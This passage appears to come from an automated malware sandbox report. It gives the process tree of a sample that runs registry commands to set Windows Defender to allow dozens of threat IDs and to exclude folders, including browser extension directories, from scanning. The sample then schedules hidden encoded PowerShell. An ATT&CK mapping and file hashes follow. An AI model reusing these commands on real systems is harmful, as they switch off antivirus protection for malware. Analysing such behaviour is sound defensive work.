\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:4216
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5772
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5656
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:6100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1120
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:2844
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:3136
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:3096
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:5780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:1112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:4696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:3116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:2856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:5192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:3272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:5468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:4052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:5476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:5836
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNyxlCFCI" /SC once /ST 03:55:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNyxlCFCI"2⤵PID:4392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:6120
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Virtualization/Sandbox Evasion
2Credential Access
Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD5b3b52eb769675fb96242c927e9ef0e2f
SHA1c51371ac1662fc18be61bd5b61f3377ab550d9cc
SHA256a23836f60d3b886fd7bf119fbb97d93ee459baf212db882a62b0fb6a0ec58830
SHA512ececaa7e55fe9564adbfdf5151dc75311569a28011f51eeb02162c4be38355f5480b010414e4da0d981eb8a343c122ea17bb28b92ad569aabc6f0ce49e461818
-
Filesize
19KB
MD5fea5536520353aa32142a95f11465367
SHA1bf4069cc7607cf080ff3989c66b612a27abca137
SHA25665383395c6fbc9014c8a42c94d5c66bd0c33b6e30a16266b79731ff238a59253
SHA5124b5593894260bade1c2b6f8b9359ede95497e093d04673e5b050a3133a873561bf86c0cfc6a9017df77c92f56421f2cab7fd5aacd7a76e1349fbe6c4d47b6483
-
Filesize
944B
MD5cb3a799921d48256ab45414af88b0aa8
SHA18888fb5656f5f11576c0fbc3ba45d7df56000d28
SHA2565ad60a0e324106c6b5a8a7c41b4eac83234ed53cf26025dd4d63c0750b265105
SHA51221b53b49d0f95cb600444b15a274c31d9374ae96dc2ab464e6ada96bae11f1000e92f6f51f62e5b91891dbbb30e6ab9c71006a9a166b8d4ae24457dcd7efdf69
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\additional_file0.tmp
Filesize2.5MB
MD520d293b9bf23403179ca48086ba88867
SHA1dedf311108f607a387d486d812514a2defbd1b9e
SHA256fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA5125d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe
Filesize1.9MB
MD5b3f05009b53af6435e86cfd939717e82
SHA1770877e7c5f03e8d684984fe430bdfcc2cf41b26
SHA2563ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7
SHA512d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\dbghelp.dll
Filesize1.7MB
MD5925ea07f594d3fce3f73ede370d92ef7
SHA1f67ea921368c288a9d3728158c3f80213d89d7c2
SHA2566d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
SHA512a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\opera_package
Filesize103.9MB
MD5401c352990789be2f40fe8f9c5c7a5ac
SHA1d7c1e902487511d3f4e1a57abdee8a94d5483ed4
SHA256f62f4ebc7eca46d9cddfb02cc0305da5efdd6f3601fb0f53da555e19558869a3
SHA512efc6d4224e3721e91efb2ea8f4b74685cba607260c69d08eac26866c52b8127080a42799d9f76ab1661b8ca63c946fcf35dddf0a63ab3cd258ea44a27dd769c8
-
Filesize
1.8MB
MD50193ae529e1b5a9af6c9e0a9764e7c0f
SHA14db7d28f2b787386c3f60cc3d646d25553311ae3
SHA256bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e
SHA512355f310885fc61f433244bdd11b65d534891e77daffb2fe4005f59f619ce564615b8959e2a99049d849dd07dfccdeba07889d839344788e5dfbc58f9b738b5c7
-
Filesize
3.3MB
MD5584b95fa5d21e178c978ed9171473514
SHA1f3f67fd04f7539b73e6fcf3b941d279212fff907
SHA2562a14c443a77b0333cc9646bc676e8c9bcd8789904f3e6b3b73ad8c604649bdb6
SHA51247fe759e2908050bcb9314a9d4cb6a807ff201847bd898a8ff73c8e96f18dd8e7f39e5446e3fa4e73444ba15e4698a2764f3a98bc8ab8897279e25b388aab1d5
-
Filesize
6.4MB
MD525bec86ec5f3be6d47f6052d92818556
SHA1fc674aca2929928fcc4b721a0fb4e973feb1f2b1
SHA256c68e172cb274a12008be6047216dbe280559b164702792817ce21ff4ba9660da
SHA512649c3e9e966d4d2679ce95f91f0fdb1638dcc1ca8555fabd87bba16a39e02ddd856a897d5d7f0a80d19f1f9e02a5e569ca11031446b24b971d6fb9000f8204c2
-
Filesize
6.7MB
MD5b119ea556def66eaa9f751a650b45af0
SHA1daf3fa0325b110183d0a233b4b0d1875f0b49ca8
SHA25653c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4
SHA51208dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4
-
Filesize
106KB
MD5fe380780b5c35bd6d54541791151c2be
SHA17fe3a583cf91474c733f85cebf3c857682e269e1
SHA256b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53
SHA512ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c
-
Filesize
4.6MB
MD5117176ddeaf70e57d1747704942549e4
SHA175e3ab6b3469d93cce9ea2f7e22b71b987ccdf2b
SHA2563c5b34de987116a4d3240e319c0da89a951c96b81e6705476a0fea27b22b20af
SHA512ca2a356929c92d314aab63d7f3b246d72783212dfa3a4507f28d41a51ca0eedc78e85b1cd453aa8e02c12509f847a0216bb702154f903291c804c8a98ec378b9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD5ed3b207e0c24c10959d89f47e0794ae4
SHA188719dc491efcbce99e7eaae3eebd39d7692548d
SHA256c8de5bf65decb0cd7fe4e629162b818228ca1468f6e6e5d06b39abe25c79ed41
SHA512135313913c5adc71a97329bdce1c028d07e99afd6a66f3c2d94a5f1c389bbad486b8e10574cf73b549d0b0fa504da7ad0f7ef9f0a4f74974cb973f43bde2317b
-
Filesize
3KB
MD5bcb6ebf2905f0ccb8aa25801981ac20f
SHA168fefd9f35c97710fc4fcdb7ca0517ecbbb930d7
SHA25659fa52da532ad65dad74084fe0df115aba37e666294f6b8f75058f03eea8106b
SHA512e979e5127e159c65dfe5d3b6439ca21e4208b58feb984364622873d07cc3c2b4fd3d9f47884a30ecd96c9e43d0d9654688642323bf00465aa2b8cd55d603df50
-
Filesize
268KB
MD53e1e8709474df25e4c4cbfac47701fc9
SHA19845a690f6c10d2d68d39637d46dbc238763501a
